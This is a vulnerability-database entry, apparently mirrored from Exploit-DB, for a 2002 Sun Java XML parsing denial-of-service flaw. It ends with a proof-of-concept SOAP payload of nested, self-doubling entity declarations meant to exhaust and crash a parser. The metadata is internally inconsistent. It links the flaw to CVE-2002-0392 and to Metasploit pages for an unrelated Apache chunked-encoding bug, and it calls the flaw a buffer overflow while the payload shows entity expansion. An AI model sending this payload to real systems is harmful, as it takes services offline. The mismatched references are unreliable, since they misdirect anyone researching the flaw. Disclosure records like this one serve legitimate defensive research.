Sun Java XML Document Handling Vulnerability

vendor:

Sun Java

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Sun Java

Affected Version From: Sun Java 1.4.0

Affected Version To: Sun Java 1.4.0

Patch Exists: YES

Related CWE: CVE-2002-0392

CPE: o:sun:sun_java

Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/, https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/, https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2002

Sun Java XML Document Handling Vulnerability

A problem has been identified in Sun Java when handling XML documents with specific constructs. An attacker with the ability to cause the software to parse malicious XML documents may have the ability to crash a system hosting Sun Java. The vulnerability is caused by a buffer overflow error when the software attempts to process an overly long entity declaration within an XML document.

Mitigation:

Sun has released a patch to address this issue.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8666/info

A problem has been identified in Sun Java when handling XML documents with specific constructs. Because of this, an attacker with the ability to cause the software to parse malicious XML documents may have the ability to crash a system hosting Sun Java. 

<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>